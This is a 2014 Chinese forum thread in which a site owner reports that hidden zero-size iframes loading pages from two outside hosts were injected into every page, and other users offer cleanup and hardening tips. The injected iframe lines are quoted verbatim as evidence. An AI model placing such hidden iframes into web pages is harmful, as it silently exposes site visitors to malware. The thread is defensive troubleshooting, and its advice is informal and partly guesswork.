日期:2014-05-17  浏览次数:20970 次

网站挂马了,紧急求助!
上周日网站被挂了木马,直到现在也找不到解决的办法,服务器那边说别人的网站都没有问题,只有我们这一个网站有木马。
        所有的页面在 <html> 标签之前现在都有以下代码:
<iframe   src=http://www.18dmm.com/dm/kehu0739.htm?1   width=0   height=0> </iframe>
<iframe   src= "http://s.gcuj.com/bd.htm?047 "   width= "0 "   height= "0 "   frameborder= "0 "> </iframe>
        但从服务器那边下载源文件,本身却没有这样的代码。
        希望高手指点一下!!!!

------解决方案--------------------
查找 iframe 试试
------解决方案--------------------
治标也要治本.

查源代码漏洞吧.尤其是上传\0字符未过滤(ASP致命漏洞)
------解决方案--------------------
期待ing
------解决方案--------------------
不是吧,页面当中没有iframe代码吗,
注意服务器上的文件夹权限,不能有写入的权限!
------解决方案--------------------
用这个软件批量查找 Search and Replace
或者你看看数据库里有没有被改动过的
------解决方案--------------------
根据你的情况,可以判断是数据库里面的数据被人写入了这样的代码,建议你更新下你的数据库里的数据
------解决方案--------------------
看看你的公共调用文件,例如conn.asp,例如function.asp等等,马多半是在公共调用文件里,所以你在本身文件是找不着的
------解决方案--------------------
光关FTP还不行,检查一下上传组件是否有漏洞,查看一下后台LOG和修改后台密码,有可能的话删除那个后台文件夹,如果还是不行,就是服务器中毒了
------解决方案--------------------
网站开发群9199502
我可以帮你解决
------解决方案--------------------
那就是数据库里面的,直接搜索www.18dmm.com或者s.gcuj.com,这个我也遇到过,你的安全没做好
------解决方案--------------------
similar answer showed

HTTP://www.ebigear.com/Fund/PlayNews.php?NewsID=28532&ID=285885
------解决方案--------------------
一般都在conn.asp等公用文件中
我去年被挂过一次,还好被我找出来了
------解决方案--------------------
adodb.stream,fso等组件不需要的都不用,要用的都改名。很有可能是被上传了 "一句话木马 ",
查找是否有 "code.asp "这个文件。

还有一种是Arp劫持,这就只有找机房帮忙了。
------解决方案--------------------
arp攻击的话,就不会是他一个网站被挂马了。

最快的方法,直接把所有代码文件下回来,整站搜索“18dmm”,也有可能在数据库里。
------解决方案--------------------
域 名可能被定位到另外主机上去了。上次一个客户的站就是这样子的。
------解决方案--------------------
下载后用批量替换软件全部替换就可以了